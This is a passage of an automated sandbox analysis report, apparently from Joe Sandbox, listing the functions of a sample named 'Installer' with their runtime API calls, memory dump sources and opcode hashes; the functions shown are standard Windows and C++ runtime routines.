                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: 406eedddefbeb9d7833c3e61e7851ba5f887be0c758b904aa1bfcef0362fc9b8
                                                                                                                                                                                                                                                    • Instruction ID: c6287b19c1afe775174186bed26e7265ea659ccbdde235811069c73e79348750
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 406eedddefbeb9d7833c3e61e7851ba5f887be0c758b904aa1bfcef0362fc9b8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50410534A006189BCF17DF68C886E9EBBF5AF45311F258455ED186F362D732AD09CB90
                                                                                                                                                                                                                                                    Function 00343C70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00343CA5
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00343CBF
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00343CE0
                                                                                                                                                                                                                                                    • __Getctype.LIBCPMT ref: 00343D92
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00343DD8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
                                                                                                                                                                                                                                                    • String ID: e.7
                                                                                                                                                                                                                                                    • API String ID: 3087743877-48725242
                                                                                                                                                                                                                                                    • Opcode ID: fa4c0a74e6552e1fd20f88fc2150d683e2dbbfc2cd04b1e3dd19bb4c7153ffb4
                                                                                                                                                                                                                                                    • Instruction ID: 5f421ebfc39ebd575b3ee4ae95ba7811c64cb0905f9056809b7b848e2f241394
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa4c0a74e6552e1fd20f88fc2150d683e2dbbfc2cd04b1e3dd19bb4c7153ffb4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43412471E006188FCB26DF98D845BAEB7F5BB88720F058219D8196F391DB35AA41CF91
                                                                                                                                                                                                                                                    Function 00350080 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00350086
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00350094
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 003500A5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                    • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                                                    • API String ID: 667068680-1047828073
                                                                                                                                                                                                                                                    • Opcode ID: a78279016db0e105796bff3dfa2a4c3ccc38c584e7334cb60eb4e52104d03210
                                                                                                                                                                                                                                                    • Instruction ID: 22bb88bbdf0eaba090eb5ed19d01c28d6ce326d76497271f9966139a2d351e1a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a78279016db0e105796bff3dfa2a4c3ccc38c584e7334cb60eb4e52104d03210
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48D05E31515611AB83336F747C0A8CD3AACFB09700B018066F40CD2250DB7846808B55
                                                                                                                                                                                                                                                    Function 00364F81 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 856799895473ea6ae34872771784cb266eae7415808e96b48123efac33ce3fb4
                                                                                                                                                                                                                                                    • Instruction ID: 2c30dbdd3e1e02bb5f2b1b9648e6e84977140788c8a023917e60d7d0a364c5bd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 856799895473ea6ae34872771784cb266eae7415808e96b48123efac33ce3fb4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FFB13974E08A499FDF13CFA8D851FADBBB4BF45304F148168E9056B396C7709941CBA0
                                                                                                                                                                                                                                                    Function 00349B30 Relevance: 9.1, APIs: 6, Instructions: 125COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 00349C97
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 00349CA8
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 00349CBC
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 00349CDD
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 00349CEE
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 00349D06
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Cpp_errorThrow_std::_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2134207285-0
                                                                                                                                                                                                                                                    • Opcode ID: 76200910d99c365ff2498cc334091e5a7efee250a1174041ce7995431ac5614f
                                                                                                                                                                                                                                                    • Instruction ID: 5853e9132e6275034fc5f4a4bc11d36b1f584bec4b84c4415866b5376c419cd4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76200910d99c365ff2498cc334091e5a7efee250a1174041ce7995431ac5614f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E641B0B5900740CBDB329F658946BABB7F8BF45320F18062ED57A2E2D1D771B904CB92
                                                                                                                                                                                                                                                    Function 0035ACE7 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,0035ACDE,00350760,0034B77F,C82EE5EC,?,?,?,?,0036BFCA,000000FF), ref: 0035ACF5
                                                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0035AD03
                                                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0035AD1C
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,0035ACDE,00350760,0034B77F,C82EE5EC,?,?,?,?,0036BFCA,000000FF), ref: 0035AD6E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                                                                                    • Opcode ID: efb2d11428259a0af732f378e666f67d81673f9088b2a7f24c333f6af57f75bd
                                                                                                                                                                                                                                                    • Instruction ID: 14e43dcd9a7b5f8a5cedc4bbc4128f24ee9c6e686fbe45b3b95638d79b7185c0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: efb2d11428259a0af732f378e666f67d81673f9088b2a7f24c333f6af57f75bd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E01F932205A159EE73736746C96D2666F8EB01B73B20032EFA24565F0EF1148466181
                                                                                                                                                                                                                                                    Function 0035B56E Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 0035B68D
                                                                                                                                                                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 0035B906
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                                    • API String ID: 2673424686-393685449
                                                                                                                                                                                                                                                    • Opcode ID: fe3f23b679737297d50f6660df1160e663a97c94e48bfde1471e24d26748cb9a
                                                                                                                                                                                                                                                    • Instruction ID: e6d74ff29051f218c6f1ecf89e93e4d02282d616f5121435d9f7b79ddc995546
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe3f23b679737297d50f6660df1160e663a97c94e48bfde1471e24d26748cb9a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24B14871800209EFCF1ADFA4C881DAEB7B9BF04312F16455AEC11AB222D731DA59DB91
                                                                                                                                                                                                                                                    Function 0034BE95 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Ref_count_base::_Decref.LIBCPMT ref: 0034BF44
                                                                                                                                                                                                                                                    • std::_Ref_count_base::_Decref.LIBCPMT ref: 0034C028
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DecrefRef_count_base::_std::_
                                                                                                                                                                                                                                                    • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                                    • API String ID: 1456557076-2671469338
                                                                                                                                                                                                                                                    • Opcode ID: 5e0badc20e3f147ee4c3a60a2e97ea358d97d9bf9032dcfff77f6085ce3c1ecf
                                                                                                                                                                                                                                                    • Instruction ID: 7c14c02b99a1ba0353c90b5d36609c42d46d2b1127f6db6f30b5955878be6de1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e0badc20e3f147ee4c3a60a2e97ea358d97d9bf9032dcfff77f6085ce3c1ecf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A7418974900209DFCB2ADF68C9459ADF7F9AF48300B59805DE44AAF652C734FA49CB52
                                                                                                                                                                                                                                                    Function 003555C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,C82EE5EC,?,?,00000000,0036BE94,000000FF,?,00355685,00000002,?,00355721,00358396), ref: 003555F9
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0035560B
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,0036BE94,000000FF,?,00355685,00000002,?,00355721,00358396), ref: 0035562D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                    • Opcode ID: 5aba878caad82e3e92ef3dcc4e135e6b9babfc44f3b0f01c735265b554f8f78d
                                                                                                                                                                                                                                                    • Instruction ID: 9ca96c35f5db8de7898aaacfd38ee1185af3acd93c890fd304eff3a5ecef789c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5aba878caad82e3e92ef3dcc4e135e6b9babfc44f3b0f01c735265b554f8f78d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F01DB31600A55AFDB239F44DC15FEEB7BCFB04715F014525F815A22A0DB789944CA50
                                                                                                                                                                                                                                                    Function 0035D6EA Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 0035D76F
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 0035D838
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 0035D89F
                                                                                                                                                                                                                                                      • Part of subcall function 0035BF11: RtlAllocateHeap.NTDLL(00000000,0035DF35,?,?,0035DF35,00000220,?,00000000,?), ref: 0035BF43
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 0035D8B2
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 0035D8BF
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1423051803-0
                                                                                                                                                                                                                                                    • Opcode ID: c19f821379daf3517cf6c642f2385e41726aacb9b62ba5db07e5569b7b6046c8
                                                                                                                                                                                                                                                    • Instruction ID: 6172299867e538aa085fe899b18cad92fa6594332950ad1209703f353bdb9ac8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c19f821379daf3517cf6c642f2385e41726aacb9b62ba5db07e5569b7b6046c8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C519372600206AFFB335F60CC81EBB77A9EF44712B160129FD14DA261E770DC5896A0
                                                                                                                                                                                                                                                    Function 0034EFF1 Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0034F005
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(00348E38), ref: 0034F024
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(00348E38,0034A2F0,?), ref: 0034F052
                                                                                                                                                                                                                                                    • TryAcquireSRWLockExclusive.KERNEL32(00348E38,0034A2F0,?), ref: 0034F0AD
                                                                                                                                                                                                                                                    • TryAcquireSRWLockExclusive.KERNEL32(00348E38,0034A2F0,?), ref: 0034F0C4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 66001078-0
                                                                                                                                                                                                                                                    • Opcode ID: 831f3a2080b2a02b1e01196c3c6c1edcd90f9abb229f025c1332274603eea853
                                                                                                                                                                                                                                                    • Instruction ID: 4ccf6e84d7d5674cd549dabc7dee5913a853d86bef68e60d37643291a249fac1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 831f3a2080b2a02b1e01196c3c6c1edcd90f9abb229f025c1332274603eea853
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23416971900A0ADFCB22CF65C48196AB3F8FF88315B19493AE45ACB942D730F985CF51
                                                                                                                                                                                                                                                    Function 0034D4C2 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 0034D4C9
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0034D4D3
                                                                                                                                                                                                                                                    • int.LIBCPMT ref: 0034D4EA
                                                                                                                                                                                                                                                      • Part of subcall function 0034C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 0034C1F6
                                                                                                                                                                                                                                                      • Part of subcall function 0034C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 0034C210
                                                                                                                                                                                                                                                    • codecvt.LIBCPMT ref: 0034D50D
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0034D544
                                                                                                                                                                                                                                                    Memory Dump Source
